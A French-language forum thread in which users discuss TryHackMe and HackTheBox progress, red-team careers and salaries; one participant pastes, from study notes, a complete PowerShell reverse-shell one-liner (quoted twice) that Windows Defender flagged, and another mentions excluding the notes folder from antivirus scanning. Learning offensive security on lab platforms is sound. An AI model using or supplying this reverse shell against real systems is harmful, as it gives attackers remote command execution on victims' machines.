Ce sujet a été résolu
Je verrais ça demain.
Je comprends pas y a autant de mon sur ce topic, ça m'attriste un peux je m'étais donné du mal pour créer des passions sur 3 topics avec des centaines de lignes. et là tout le monde se reveil. Je comprends pas
Je comprends pas y a autant de mon sur ce topic, ça m'attriste un peux je m'étais donné du mal pour créer des passions sur 3 topics avec des centaines de lignes. et là tout le monde se reveil. Je comprends pas
Tes topics étaient super en plus, c'est ce qui m'a motivé à continuer.
Mais je crois que quand il y a un peu trop de lecture ça passe difficilement pour les kheys. La tryhackme agis comme une drogue, regarde @Me0w qui ne fume même plus et passe sont temps à hack des machines
C'est vraiment addictif comme truc, c'est bien foutu
Mais je crois que quand il y a un peu trop de lecture ça passe difficilement pour les kheys. La tryhackme agis comme une drogue, regarde @Me0w qui ne fume même plus et passe sont temps à hack des machines
il y a 4 mois
Nan mais j'ai deux ans d'expérience et je suis dans une entreprise de gros con et d'éternelle junior
Veulent pas m'augmenter alors que moi et mon pote on a créer la redteam de notre équipe en s'inspirant de la CRTO et CRTL
Veulent pas m'augmenter alors que moi et mon pote on a créer la redteam de notre équipe en s'inspirant de la CRTO et CRTL
Putain, t'es à combien l'année si c'est pas indiscret?
Si t'as pas peur de changer d'air, go Suisse c'est vachement plus intéressant que la France dans ce domaine
Si t'as pas peur de changer d'air, go Suisse c'est vachement plus intéressant que la France dans ce domaine
il y a 4 mois
Vous m'avez l'air sympatonche mais il faut jamais faire confiance à personne sur internet
Je fais confiance qu'au gens que j'ai vue dans la vrai vie
Je parle pas de nous, mais si tu associes ton compte thm avec un allias qui transfère les mails vers ton mail principal, tu peux partager l'allias avec nous sans partager ta réelle adresse email.
Sinon, c'est que tu ne fais pas confiance au tiers qui propose le service de transfert (addy.io etc... )
Sinon, c'est que tu ne fais pas confiance au tiers qui propose le service de transfert (addy.io etc... )
il y a 4 mois
J'ai fumé des clopes nonobtsant, mais la j’entame le premier
à 2h41, c'est du jamais vu
Vous devez être au niveau 10 pour voir ce message.
il y a 4 mois
J'ai fumé des clopes nonobtsant, mais la j’entame le premier
à 2h41, c'est du jamais vu
Vous devez être au niveau 10 pour voir ce message.
C'est bien ça va te faire des économies là-dessus
il y a 4 mois
Me0w
4 mois
Oh, je suis dans le top 9% maintenant
Il y a des centaines de milliers d'inscris sur tryhackme mais ils abandonnent tous
tu passes devant 3000 personnes à chaque room terminée
tu passes devant 3000 personnes à chaque room terminée
il y a 4 mois
Yes ça m'a beaucoup aidé, j'ai 200 rooms complété sur ce site. Mais je préfère HTB.
FDV, Je donne des cours de cybersécurité gratuit tout les vendredi -> https://discord.gg/PXFh8QXkej
il y a 4 mois
Putain, t'es à combien l'année si c'est pas indiscret?
2 ans, c'est ma première entreprise. Oui quand tu as ton premier CDI tu comprends vite que la France c'est un demi pays tiers mondiste et qu'il faut vite partir
FDV, Je donne des cours de cybersécurité gratuit tout les vendredi -> https://discord.gg/PXFh8QXkej
il y a 4 mois
Oui, j'ai 5520 points actuellement
Ah oui tu es bien monté ces derniers jours gg
Je suis dans les 10k il me semble, ça ralenti un peu, la room des escalations de privilège est bien longue
Je suis dans les 10k il me semble, ça ralenti un peu, la room des escalations de privilège est bien longue
il y a 4 mois
Yes ça m'a beaucoup aidé, j'ai 200 rooms complété sur ce site. Mais je préfère HTB.
Une fois que tu as le niveau hackthebox doit être vraiment sympa en effet, c'est la où je compte aller après tryhackme
il y a 4 mois
Ah oui tu es bien monté ces derniers jours gg
il y a 4 mois
Peut être qu'il suffit d'être premier une fois ? Bizarre mais bien joué pour le badge en tout cas, j'ai du passé or je verrais demain je suis sur téléphone actuellement
il y a 4 mois
miko
4 mois
@Me0w J'ai fais paniquer mon Windows en prenant des notes ayaa, j'ai noté un reverse-shell pour powershell dans Obsidian (app pour prendre des notes), dès le moment ou j'ai collé le reverse shell, mon Windows la détecté comme un virus et à supprimé mon fichier de notes
Le reverse-shell en question :
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Le reverse-shell en question :
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Faut jamais prendre des notes sur windows pauvre folle
Je te le dis en connaissance de cause. Un jour j'ai mis des notes à moi dans une clef usb, je l'ai transféré dans mon windows et POUF. mon defender à tout supprimer. Toujours avoir un github de secour
Je te le dis en connaissance de cause. Un jour j'ai mis des notes à moi dans une clef usb, je l'ai transféré dans mon windows et POUF. mon defender à tout supprimer. Toujours avoir un github de secour
il y a 4 mois
Tu peux utiliser un allias pour ton mail de boulot ou tu ne fais pas confiance ?
Mais n'hésitez pasà passer dans mon discord pour demander de l'aide, c'est 100% onchois
il y a 4 mois
2 ans, c'est ma première entreprise. Oui quand tu as ton premier CDI tu comprends vite que la France c'est un demi pays tiers mondiste et qu'il faut vite partir
J'voulais dire salaire à l'année
Les juniors commencent autour des 75-80k en Suisse en moyenne
il y a 4 mois
Faut jamais prendre des notes sur windows pauvre folle
Malheureusement c'est mon pc principal et j'ai que ça en attendant de passer sous Linux, j'ai pas trop envie de les save sur ma VM kali, je vais juste ajouter une exception au folder de obsidian pour que l'av ne scan plus le dossier.
Après j'ai pu récupérer en faisant restaurer la menace ça va
Après j'ai pu récupérer en faisant restaurer la menace ça va
il y a 4 mois
J'voulais dire salaire à l'année
Je suis à 45 K
ALED
ALED
il y a 4 mois